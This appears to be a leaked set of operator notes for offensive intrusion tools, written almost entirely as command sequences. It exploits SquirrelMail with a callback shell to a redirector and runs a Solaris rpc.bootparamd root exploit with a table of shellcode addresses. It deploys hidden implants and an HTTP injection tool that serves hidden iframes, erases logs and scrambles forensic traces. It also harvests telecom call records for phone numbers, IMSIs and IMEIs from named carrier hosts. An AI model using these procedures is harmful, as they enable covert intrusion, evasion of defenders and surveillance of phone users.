cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTK
EY -b
file argfile*.enc
### to encrypt all at the same time:
for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename
$i .txt`.enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc
### Tips for running the CURSEHAPPY 3.2
### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or >>T: )!!!!
### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc if additional
### passes are needed for the date range
### DO NOT use -loglevel if also using >L: or >T: (mixed output corrupts the decryption)
### The phone list is NOT deleted automatically in v3.2
### remove it between each run as a practice
### Useful options:
-n name of text file containing phone numbers
-rt record type: eh, ls, ss, RECTYPE
-files list of files to parse (can contain wildcards) optional - same as no option
-d output optional fields
-all all record output (no search performed)
-loglevel [#] level of info emitted via stderr:0,1,2,3
#############
############# for loglevel testing (local file should be ascii?)
#############
-put /current/down/argfiles/argfile1.enc adm
KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -w e -loglevel 2 -d /CHAN
GEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.tes
t
-beep 15
-rm adm
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc1 -
o cdrhits.cursehappy.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc2 -
o cdrhits.cursehappy.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
######
###### copy DECRYPTED data to media
######
ls -l cdr*txt*
mz
cp cdr*txt* /mnt/zip*/PROJECTNAME
ls -l /mnt/zip*/PROJECTNAME
uz
#####
##### clean up
#####
-rm crond adm
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
-burnBURN
###
### END File user.tool.cursehappy.preversion4.COMMON
### (see also ../etc/user.tool.cursehappy.preversion4.COMMON)
###
### BEGIN File user.tool.elideskew.COMMON (see also ../etc/user.tool.elideskew.COMMON)
###
#########################################################
# ELIDESKEW v1.0.0.1
#########################################################
### Publicly known vulnerability in SquirrelMail versions 1.4.0 - 1.4.7
### Patched for versions => 1.4.8
### Tested on CentOS and FreeBSD successfully
### will be apache on target; use appropriate tool (if available) to elevate
mx
:%s/REDIRECTOR_IP/REDIRECTOR_IP/g
:%s/TARGET_IP/TARGET_IP/g
:%s/RANDOM_PORT/RANDOM_PORT/g
`x
### scan port 80 to look for squirrel banner ( may report version; needs to
### be version 1.4.0 - 1.4.7 to work)
### need banner to help determine squirrel mail dir
-scan http TARGET_IP
### local scripted window [[ note: the backticks "`" may or may not be necessary ]]
./elideskew.pl -u http://127.0.0.1/webapps/sq147 -l /current/up/morerats/noserv
er-3.0.3.6-i686.pc.linux.gnuoldld.redhat-6.0 -r /var/www/html/webapps/sq147/data
/nos -c '`D=-cREDIRECTOR_IP:RANDOM_PORT /var/www/html/webapps/sq147/data/nos`'
### if all goes well you will be apache on target (note: some apache configurations run
### as nobody)
### need to elevate; choose appropriate tool
### cleaning logs
Logging varies by platform:
on CentOS - /var/log/httpd/error_log ; CentOS runs SELinux so it also logs when nopen
tries to call back in /var/log/messages. CentOS will not allow nopen to bind
to a port as a server so must use callback mode for nopen
on FreeBSD - [APACHE_PREFIX]/logs/error_log
###
### END File user.tool.elideskew.COMMON
### (see also ../etc/user.tool.elideskew.COMMON)
###
### BEGIN File user.tool.poptop.COMMON (see also ../etc/user.tool.poptop.COMMON)
###
### EncTelnet/Poptop
### To use Nopen over an existing connection (i.e. telnet)
### Window 1: Nopen Window - Setup tunnel to dude telnetting to
-tunnel
l 2323 DUDE 23
### Window 2: Local scripted window - Use spawn to be your telnet client
### The window will look kinda funny with debug telnet negotiation stuff
### going by, and you'll see the typed password in the clear...get over it
spawn.v3 127.0.0.1 2323 telnet
<login as usual, unsets, blah blah...>
### Window 3: Local window: prep poptop/noserver
cp TARGNOSERVER /current/up/nscd
cp TARGPOPTOP /current/up/crond
compress nscd crond
uuencode nscd.Z nscd.Z > nscd.uu
uuencode crond.Z crond.Z > crond.uu
### Window 2: Accept files for upload
uudecode
--p /current/up/nscd.uu
uudecode
--p /current/up/crond.uu
uncompress nscd.Z crond.Z
### Window 2: Run Nopen and poptop
chmod 700 nscd crond
PATH=. D=-lPORT nscd
PATH=. crond
### 1st prompt for "arg" is port
PORT
### 2nd prompt for "arg" is file descriptor, use 0 for stdin
0
### Should now get a line saying "tty is setup"
### Window 4: Local scripted window: setup for Nopen connect
noclient -l 8080
### Window 2: type "---" and hit enter, should
### have a connection in your noclient window then
---
### Window 4: To get multiple windows on target, will need use this window
### as a -tunnel window, and tunnel to yourself over loopback
### And oh yeah, remove the binaries
-rm crond nscd
-tunnel
l PORT 127.0.0.1
### In other scripted windows
noclient 127.0.0.1:PORT
### Do whatever you need to do...
### When all done...
-burnBURN
### Window 2: this window will now probably go nuts, ^C will
### take you back to your op box shell prompt, and officially
### close your telnet connection (see connection close in your
### Window 1 -tunnel window).
### Note that there will be another log entry put into
### wtmp that cannot be toasted away, should not be seen by admins though...
EOF
###
### END File user.tool.poptop.COMMON
### (see also ../etc/user.tool.poptop.COMMON)
###
### BEGIN File user.tool.seconddate.COMMON (see also ../etc/user.tool.seconddate.COMMON)
###
# SECONDDATE
:syntax on
#########
# SET UP
#########
# get tasking directories and put them on media
# check op plan for correct tasking date
/projects/web_proxy_tasking/to_lowside/YYYYMMDD/YYYYMMDD.HH.MM.SS-IP_ADDRESS
# copy and extract binaries to /current/bin
mz
cp /mnt/zip/seconddate_tools.tar /current/bin
cd /current/bin
tar xvf /seconddate_binaries.tar
# copy tasking directories to /current/bin/sd and extract
cp -r /mnt/zip/TASKING /current/bin/sd
cd /current/bin/sd
# copy the SECONDDATE command and control binary to each tasking directory
# the rules are set by relative path;
# the command and control binary needs to be in the same path as the inject and regex files
# tasking directory name format: YYYYMMDD.HH.MM.SS-IP_ADDRESS
# inject tag name format: YYYYMMDDHHMMSS-IP_ADDRESS-inject-<number>.bin
# regex file name format: YYYYMMDDHHMMSS-IP_ADDRESS-regex-<number>.bin
cp /current/bin/sd/1.1.1.1/Binaries/Seconddate_CnC /current/bin/sd/YYYYMMDD.HH.M
M.SS-IP_ADDRESS
#################
# PREP COMMANDS
#################
# all commands to run at local Seconddate_CnC prompt are in commands.txt
# you should have already copied it here:
# /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS/commands.txt
cd /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS
egrep "disable" commands.txt > disable.txt
egrep "rule" commands.txt | egrep -v "showrule --all" > rules.txt
egrep "enable" commands.txt > enable.txt
# open command files in gedit text editor; xemacs works too; vi doesn't work
gedit disable.txt &
# open the other files rules.txt and enable.txt
####################
# CONNECT TO IMPLANT
###################
# local_port - listen on this port locally; i.e. the ops box; pick a random port
# target_ip - ip of target that is running SECONDDATE to which you want to connect
# target_port - port to which you'll connect to target; can be the same as local_port
mx
:%s/LOCAL_UDP_PORT/LOCAL_UDP_PORT/g
:%s/TARGET_IP/TARGET_IP/g
:%s/TARGET_UDP_PORT/TARGET_UDP_PORT/g
`x
# set up UDP tunnel from redirector; won't work locally on target box
# u <random_local_port> <target_ip> <random_target_port>
-tunnel
u LOCAL_UDP_PORT TARGET_IP TARGET_UDP_PORT
# in locally scripted window
# run CnC
# ./Seconddate_CnC 127.0.0.1 <udp tunnel port>
cd /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS
./Seconddate_CnC 127.0.0.1 LOCAL_UDP_PORT
# run command
ping
# should receive an 'OK'
# if you can't get an OK, the target may have rebooted; tool only runs in memory
# connect to the target via -irtun and check to see if SECONDDATE is running
# if it's not running you need to deploy
ps -ef | grep IMPLANT_FILENAME
cd /dev; ps -ef | grep IMPLANT_FILENAME
##############
# RUN COMMANDS
#############
# help menu
?
#or
help
# do these first
ping
# synopsis of rules and injects
getinfo
# check rule log
getlog
# show all rules
showrule --all
# have gedit window with rules commands available
# if you still have gedit open with the commands files, go to the disable commands section below
# if you closed it after setup, reopen the commands files with gedit
# command files you previously set up are here including the commands.txt file:
# /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS
# open command files in gedit text editor; xemacs works too; vi doesn't work
cd /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS
gedit disable.txt &
# open the other files rules.txt and enable.txt from within gedit
# run disable commands only for enabled rules you know are going to change
# otherwise, disable all of the rules
# disable commands are in the file disable.txt
# clear log only if instructed to do so
# will fail if any rules are enabled
clearlog
# set rules; make sure the rules in rules.txt match what is on target
# rule commands are in the file rules.txt
# enable rules; watch for "Enabled: yes" in each rule displayed
# enable commands are in the file enable.txt
# show all rules
showrule --all
# check for empty rule enabled:
getinfo
# if the matches/hits/injects are increasing rapidly, then you probably enabled an empty rule
# find the empty rule that's enabled
getlog
# look for the rule that has the most hits
# disable it and display it with showrule
# done
exit
# copy script files
# when finished with locally scripted window, type exit, or type CTL-D only once
# this reveals the name of the script file
cp script.<some_number> script.<target_ip>.seconddate.log
# you can remove the original script if you like
#########
# DEPLOY
#########
# if the target box rebooted, you'll have to deploy the tool
# connect via -irtun
# hidden_dir - hidden directory on the target
# INCISION targets will have a manually created hidden directory
# STOICSURGEON targets can run SECONDDATE from the STOICSURGEON directory
# sd_binary_path - where the SECONDDATE binaries are located on the ops box:
# /current/bin/sd/1.1.1.1/Binaries
# implant_filename - what you want to call the SECONDDATE binary on target
mx
:%s:HIDDEN_DIR:HIDDEN_DIR:g
:%s/SD_BINARY_PATH/SD_BINARY_PATH/g
:%s/IMPLANT_FILENAME/IMPLANT_FILENAME/g
`x
# INCISION targets; skip if STOICSURGEON
# create hidden directory on linux target if you don't have one already
# mkdir -p /tmp/.<name_of_dir_to_hide>; __HMODE__=enable touch /tmp/.<name_ofdir
_to_hide>
# try to use a directory name that blends in on the target
# example:
# mkdir -p /tmp/.orbit561; __HMODE__=enable touch /tmp/.orbit561
mkdir -p HIDDEN_DIR; __HMODE__=enable touch HIDDEN_DIR
# make sure the directory was created
-ls HIDDEN_DIR
# make sure the directory is hidden
# you should not see the hidden directory
cd /dev; ls -al HIDDEN_DIR
# cd to hidden directory
# STOICSURGEON targets can run SECONDDATE from the STOICSURGEON directory
# INCISION targets run from hidden directory
# -cd /tmp/.orbit561
-cd HIDDEN_DIR
# put up tool
# -put <tool_location_opsbox> <tool_name_on_target>
# example
# -put /current/bin/sd/1.1.1.1/Binaries/Seconddate_Implant crond
-put SD_BINARY_PATH IMPLANT_FILENAME
##################
# START SECONDDATE
##################
# look for setsid
which setsid
# or
locate setsid
# run:
setsid /bin/bash -c 'PATH="." crond' > /dev/null 2>&1 &
# or, if there's no setsid
# -shell
# PATH=. crond
-shell
PATH=. IMPLANT_FILENAME
# Ctrl-D to get out of shell and get your NOPEN prompt
# be careful
# if there's no setsid, get noserver pid (parent of nopen pid)
# you'll have to kill the root noserver later when getting off target
# i.e. the parent pid of the nopen window you're in
-pid
# INCISION targets make sure it's hidden
# annotate pid of running implant in your opnotes
# cd /dev; ps -ef | grep crond
cd /dev; ps -ef | grep IMPLANT_FILENAME
# remove implant
# -rm crond
-rm IMPLANT_FILENAME
# in locally scripted window
# run CnC
./Seconddate_CnC 127.0.0.1 LOCAL_UDP_PORT
# help menu
help
# ping
ping
###############
# LEAVE RUNNING
###############
# may want to leave implant running and come back later
# if implant is left running exit from the CnC tool
exit
# check lastlog for reboot frequency
last -100 | egrep "hutdow|eboo"
# INCISION targets make sure the running implant is hidden
# cd /dev; ps -ef grep <implant_filename>
cd /dev; ps -ef grep IMPLANT_FILENAME
###########
# UNINSTALL
###########
# to stop running implant in preparation for leaving target box
# in local CnC window that's scripted, uninstall the implant
uninstall
# in NOPEN window
# check the process list; make sure it's not hung; if hung, kill it
kill -9 <implant_pid>
##########
# FINISHED
##########
# getting ready to get off the target
# to burn or not to burn?
# read all of the following before getting off target
# if you're not leaving the implant running after getting off the target:
# - make sure you uninstall the implant as stated above
# - ensure it not hung; if so, kill it
# - then burn
#
# if you're on target under a noserver that did not spawn the implant
# process you may burn, i.e. the implant process is not the child
# of the noserver process
#
# if you ran the implant using 'setsid', you may also burn:
-burn
# if you ran the implant under your present noserver and wish to leave it
# running, you need to make sure the implant continues when done with target
# if there was no 'setsid' on the target box when you ran the implant:
# - kill the noserver that is listening under which you started the implant
# if you burn in this case the implant process will be killed
kill -9 <noserver_pid>
# - use "-exit" to get out of all nopen windows
-exit
# check your connection to the implant from the redirector next to the
# target running the implant
# run a few commands
ping
getinfo
# if connection is OK then you're done
ping
# should receive an 'OK'
# if you can't connect to the implant
# get back up on target and check to see if implant is still running
# if the implant is not running you may have missed something when running
# the implant or disconnecting
# put it back up and run it again
# if you can't connect and the implant is running try troubleshooting
# the ports you're using
# copy script files
# when finished with locally scripted window, CTL-D only once
# this reveals the name of the script file
cp script.<some_number> script.<target_ip>.seconddate.log
# you can remove the original script if you like
#///////////////////////////////
# TASKING BY HAND - THE OLD WAY
#//////////////////////////////
#############
# INJECT FILE
#############
# configure inject file
# you will need to have a file containing the data for the inject packet
# first the http info:
# then the tag followed by 2 carriage returns
# example
<inject_file_begin>
HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache,no-store
<html><meta http-equiv="refresh" content="0"><body><iframe src="<REPLACE_WITH_UR
L_TO_USE>"height="1" width="1" scrolling="no" frameborder="0" unselectable="yes"
marginheight="0" marginwidth="0"></iframe></body></html>
<inject_file_end>
#####################
# REGULAR EXPRESSIONS
#####################
# regular expression file
# needed to pass to implant as argument when using regex in a rule
# can't have any carriage returns or newlines in the file
# it must only contain the characters relative to the regex
# use vi or echo:
vi -b -c "set noeol" <filename>
# or
echo -n <regex> > <filename>
#######
# RULES
#######
# set rule
# rule 1 --srcaddr <target_network_address> --srcmask 255.255.255.0 --dstport 80
--maxinjections 10 --injectwindow 600 --nocheckregex --injectfile pkt
# examples:
rule 1 --dstport 80 --maxinjections 2 --injectwindow 600 --regexfile <regex_file
_1> --injectfile pkt
rule 2 --dstport 80 --maxinjections 2 --injectwindow 600 --regexfile <regex_file
_2> --injectfile pkt
# showrule
showrule 1
# to show all rules you'll have to wait a bit
# the tool will iterate through all 64 whether empty or not
# enable rule(s)
# you have to enable them individually
enable rule 1
# check for hits
getinfo
# check log
getlog
# when done disable rules
disable 1
# get last dump of log
getlog
# clear log
clearlog
###
### END File user.tool.seconddate.COMMON
### (see also ../etc/user.tool.seconddate.COMMON)
###
### BEGIN File user.tool.ebbisland.COMMON (see also ../etc/user.tool.ebbisland.COMMON)
###
EBBISLAND
(Exploit for Solaris 2.6, 2.7, 2.8, 2.9 and 2.10)
First ensure that the vulnerable rpc service(bootparam) is running. You must
be able to reach the target system's TCP port that the designated target RPC
is listening upon.
Example
$ rpcinfo -p <target system>
program vers proto port service
100000 4 tcp 111 rpcbind
100000 3 tcp 111 rpcbind
100000 2 tcp 111 rpcbind
100000 4 udp 111 rpcbind
100000 3 udp 111 rpcbind
100000 2 udp 111 rpcbind
100232 10 udp 32772 sadmind
100083 1 tcp 32771
100221 1 tcp 32772
100068 2 udp 32773
100068 3 udp 32773
100068 4 udp 32773
100249 1 tcp 32782
100026 1 udp 32800 bootparam
100026 1 tcp 32790 bootparam
********************************************************************************
**************
EBBISLAND USAGE.
ebbisland: (-A <address>) Shellcode address
ebbisland: (-C) /core file overwriter/scrambler. This option throws the attack,
but uses pseudo-random binary data in place of the actual shellcode, to produce
a /core file free of suspicious content. This would be used in the case where EB
BISLAND failed to successfully exploit the target, and the operator wanted to tr
y and "purify" the file left in /core before quitting.
ebbisland: (-c <procnum>) Procedure number. Defaults to 0.
ebbisland: (-D) For an extra dummy connection
ebbisland: (-N) Use for non-inetd started services (i.e. rpc.bootparamd)
ebbisland: (-M <mtu>) Choose size of data part of packet to send. Default is 1260. This could affect the landing zone size.
ebbisland: (-P <prog>) Optional prog to exec, re-using exploit socket.
ebbisland: (-r <prognum>) RPC program number
ebbisland: (-s <source port>)
ebbisland: (-V) Provides verbose outputs, where appropriate and desired.
ebbisland: (-X | -F) -X For indirect/xdr_replymsg programs, and -F for others
********************************************************************************
***********
Table of Exploit addresses for rpc.bootparamd (SPARC)
100026 rpc.bootparamd 2.6 -X -N 0x641a0
100026 rpc.bootparamd 2.7 -X -N (earlier) 0x65798
100026 rpc.bootparamd 2.7 -X -N (earlier) 0x6d8d8
100026 rpc.bootparamd 2.8 -X -N 0x7c760
100026 rpc.bootparamd 2.9 -X -N 0x6e908
100026 rpc.bootparamd 2.10 -X -N 0x68318
********************************************************************************
*************
Redirector:
-tunnel
l <RHP> <TARGET IP> <BOOTPARAM_TCP_PORT>
Example:
l 32794 10.40.1.2 32790
Exploit:
./ebbisland -t <REDIRECTOR_IP> -p <REDIRECTOR_PORT> -r <TARGET_RPC.BOOTPARAMD_PR
OGRAMNUMBER> -X -N -A <SPECIFIC_SHELLCODE_ADDRESS>
Example against Solaris 2.9:
./ebbisland -t 127.0.0.1 -p 32794 -r 100026 -X -N -A 0x6e908
********************************************************************************
**
Exploit will provide ROOT shell access.
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
pwd
id
which uudecode uncompress
cd /tmp
mkdir .scsi
cd .scsi
# locally
packrat RAND_PORT
<ctrl><c> # packrat command
gedit /current/up/sendmail.Z.uu
# Target
/usr/bin/uudecode; ls -latr
select all/copy gedit contents into Target exploit window
uncompress sendmail.Z
ls -l
chmod 700 sendmail
PATH=. sendmail
# from redirector
-nstun TARGET_IP (EnJOY)
*******************************************************************************
CLEANING.
* The correct EBBISLAND attack for the remote target architecture must be used, or else the attack will fail, and the chosen TCP RPC daemon
will likely (1) abort and /core dump, and (2) log heavily. If this should occur,
a /core file will be left on the remote system. This /core file
will contain our attack data buffers, including "shellcode". The technique could
then be reverse engineered and developed into an attack. That's
why we have the '-C' option...please rerun the attack, and generate 1 more /core
file, containing our semi-innocuous pseudo-random shellcode data.
# Logging considerations: Quite a few log messages will be generated on the target as each subsequent attack attempt fails, most likely written to the /var/adm/messages file. These could include messages similar to...
Sep 27 14:37:23 target inetd[146]: [ID 858011 daemon.warning] /platform/SUNW,Ult
ra-Enterprise-10000/lib/dr_daemon: Illegal Instruction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 629332 daemon.notice] dr_daemon att
empting AP interaction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 264428 daemon.error] ld.so.1: dr_da
emon: fatal: libap.so: open failed: No such file or directory
Sep 27 14:37:24 target dr_daemon[23501]: [ID 355200 daemon.error] dr_daemon oper
ating in NO AP interaction mode
Sep 27 14:37:24 target dr_daemon[23501]: [ID 309875 daemon.notice] NOTICE: recov
ered old state file '/tmp/.dr_extra_info'
Sep 27 14:43:10 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/k
cms_server: Illegal Instruction - core dumped
Sep 27 14:43:11 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/k
cms_server: Segmentation Fault - core dumped
Sep 27 14:43:13 target last message repeated 1 time
Sep 27 14:43:14 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/k
cms_server: Illegal Instruction - core dumped
Sep 27 14:43:15 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/k
cms_server: Segmentation Fault - core dumped
Sep 27 14:43:17 target last message repeated 2 times
Sep 27 14:43:55 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.meta
d: Illegal Instruction - core dumped
Sep 27 14:43:56 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.meta
d: Bus Error - core dumped
Sep 27 14:43:57 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.meta
d: Segmentation Fault - core dumped
###
### END File user.tool.ebbisland.COMMON
### (see also ../etc/user.tool.ebbisland.COMMON)
###
### BEGIN File user.tool.enemyrun.COMMON (see also ../etc/user.tool.enemyrun.COMMON)
###
##################
#### ENEMYRUN ####
##################
## copy and paste this into the window if you want syntax highlighting:
## it makes scripts a bit easier to read
:syntax on
##############
## ER SETUP ##
##############
##
## only generate an encryption key value if you don't already have one; ask first
##
#md5sum /current/down/tcpdump.raw
##
## vi Search/Replace commands:
## projectName - self explanatory, all CAPS
## date field - today's date, used for output files
## hostname.ip - hostname of the box and IP address exactly as displayed in nopen window title bar
## or as seen in /current/down
## cryptkey - encryption key (already have one, or use output from below md5sum command)
##
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOSTNAME.IP/HOSTNAME.IP/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
##
## copy the ER directory "er_PROJECTNAME" from the project's /targets/<proj_name>/sustained directory
## to /current/down and make sure there are no tarballs in /current/down
##
mz
cp -r /mnt/zip/er_PROJECTNAME /current/down
cd /current/down/er_PROJECTNAME
uz
##
## save the encryption key locally in /current/down
## whether you have a new or old key:
##
echo CRYPTKEY > /current/down/cryptkey.enemyrun.DDMonYY
## copy key to ER directory if creating a new key
echo CRYPTKEY > /current/down/er_PROJECTNAME/cryptkey.enemyrun.DDMonYY
##
## implant hidden directory for script commands
## location is implant dependent
## INCISION:
## Solaris - /platform/SUNW,SystemEngine/kernel/drv
## Linux - (hidden independently; check old opnotes)
## STOICSURGEON: (hidden directory is displayed at beginning of FTSHELL/ish callback)
## no trailing /
##
mx
:%s:IMPLANT_HIDDEN_DIRECTORY:IMPLANT_HIDDEN_DIRECTORY:g
'x
##
## prepare files containing numbers to search for:
## if files containing the numbers to search available:
##
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
##
## prep the argfiles:
## make sure the files are ASCII and contain NO EMPTY LINES!!
## make sure the last line does not contain a null character at the end
## (vi the file, add a carriage return to the last line, then delete the empty line and save)
## "file" results:
## this will not work: ASCII text, with CRLF line terminators
## this WILL: ASCII text
##
cat arg*
file arg*
dos2unix arg*
file arg*
##
## if no data media is provided:
## locally, create a file of numbers to grep for with each number on a separate line
## make sure there are NO EMPTY LINES!!!!
## Format of each type of argument:
## p123456789 - phone number
## s123456789 - IMSI
## e123456789 - IMEI
## c123/456 - Cell/LAC (no leading 0's)
##
cd /current/down/argfiles
vim /current/down/argfiles/argfile1.txt
##
## encrypt argfiles / target files
##
## encrypt the ascii list...first make sure you have the encryption tool:
which cryptTool.v1.0.Linux2.4.18-14.targetdl
## if cryptTool not in PATH, change your PATH or insert full path in command
## to encrypt one at a time...skip to next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTK
EY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTK
EY -b
## to encrypt all at the same time:
for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename
$i .txt`.enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc
##
## on target look at CDR directories:
## - use the following commands to determine the location of current CDR data storage
## - once you identify the location of the data, you'll use the head/tail commands
## to determine the date ranges being saved
## - these date ranges will be used as settings in the ER configuration file(s)
##
##
## typical file locations per host:
##
######################### aromaseal:
######################### desertvista:
-lt /var/archive/output_billing
-vget /var/archive/output_billing/MoveData.sh
######################### diamondaxe:
########################## editionhaze:
## billing02 10.100.10.140
ls -latr /d08/saba/CDR/out/MS* | head -10
ls -latr /d08/saba/CDR/out/MS* | tail -10
ls -latr /d08/saba/CDR/out/MS* | wc -l
########################## liquidsteel:
########################## serenecosmos:
ls -latr /var/opt/archive/tape/*/*_S_*.gz | head -10
ls -latr /var/opt/archive/tape/*/*_S_*.gz | tail -10
########################## sicklestar:
## magnum: CURSEHAPPY not working on all SS .usd files :-(
## Try these first, should be all of them in one spot
ls -latr /usd_archive/mc_storage/*usd | head -10
ls -latr /usd_archive/mc_storage/*usd | tail -10
## if none in previous ones...
ls -latr /sys1/var/billing/out_coll/*usd | head -10
ls -latr /sys1/var/billing/out_coll/*usd | tail -10
ls -latr /sys1/var/alcatel/out_coll/*usd | head -10
ls -latr /sys1/var/alcatel/out_coll/*usd | tail -10
ls -latr /sys1/var/billing/msc_is2 | tail -20
######################### qualitygel:
########################## wholeblue:
## tpmw01 10.3.4.55
## tpmw02 10.3.4.56
## verifies isb, khi, and lhr directories:
ls -ld /tp/med/datastore/collect/siemens_msc_*
ls -ld /tp/med/datastore/collect/siemens_msc_*/.tmp_ncr
ls -ld /tp/med/archive/collect/siemens_msc_*
ls -ld /tp/med/archive/collect/siemens_msc_*/.tmp_ncr
## shows oldest and newest files in directories:
ls -latr /tp/med/datastore/collect/*isb*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*isb*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*khi*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*khi*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | tail -10
## isbapro1 10.5.7.51
## nothing new
-lt /u01/product_evdp/evident/data_store/collect
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | tail -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | tail -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | tail -
10
-lt /u03/archive/collect
## newer stuff
ls -latr /u03/archive/collect/siemens_msc_isb01 | head -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | tail -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | wc -l
## old stuff:
ls -latr /u03/archive/collect/siemens_msc_khi01 | head -10
ls -latr /u03/archive/collect/siemens_msc_khi01 | tail -10
#############
## COLLECT ##
#############
##
## cd to hidden directory where ENEMYRUN is set up
## when in the hidden directory, there could be two subdirectories;
## one for a forward instance and one backward (e.g. erf and erb)
##
-cd IMPLANT_HIDDEN_DIRECTORY
##
## there should be files in:
## er*/aux_*/output/final
## and possibly if parsing is occurring:
## er*/aux_*/output
##
-ls -R er*
-ls -R IMPLANT_HIDDEN_DIRECTORY/er*
##
## stop current instances on ENEMYRUN
## need name of process ENEMYRUN is running as on target; should be on plan, or check old opnotes
## ER_PROCESS_NAME: name under which ENEMYRUN is running on target; try nscd which will look like ./nscd
##
#ps -ef | grep ENEMYRUN_PROCESS_NAME
ps -ef | grep nscd
## kill with SIGTERM; if it doesn't work use kill -9
## ENEMYRUN_PID: process id under which ENEMYRUN is running on target
kill -15 ENEMYRUN_PID
##
## collect parsed CDRs and logs created from the backward directory
## files are encrypted
##
-get IMPLANT_HIDDEN_DIRECTORY/er*/aux_*/output/final/*
-get IMPLANT_HIDDEN_DIRECTORY/er*/logs/final/log*
## in a local window make sure you have them all:
ls -laR /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/er*
##
## clean ER directories
##
## remove parsed CDRs
rm -fr IMPLANT_HIDDEN_DIRECTORY/er*/aux_*/output/final/*
## remove old logs
rm -f IMPLANT_HIDDEN_DIRECTORY/er*/logs/final/log*
## remove the status.log file >>>ONLY<<< from the >>>BACKWARDS<<< directory
rm -f IMPLANT_HIDDEN_DIRECTORY/erb/status.log
-ls -R er*
-ls -R IMPLANT_HIDDEN_DIRECTORY/er*
##
## edit ER configuration files
##
## in a local window
cd /current/down/er_PROJECTNAME
## find ER configs
ls -la er_conf*.txt
## should usually not have to edit the forward config, er_conf_fwd*.txt
## edit the backwards config, er_conf_bwd*.txt
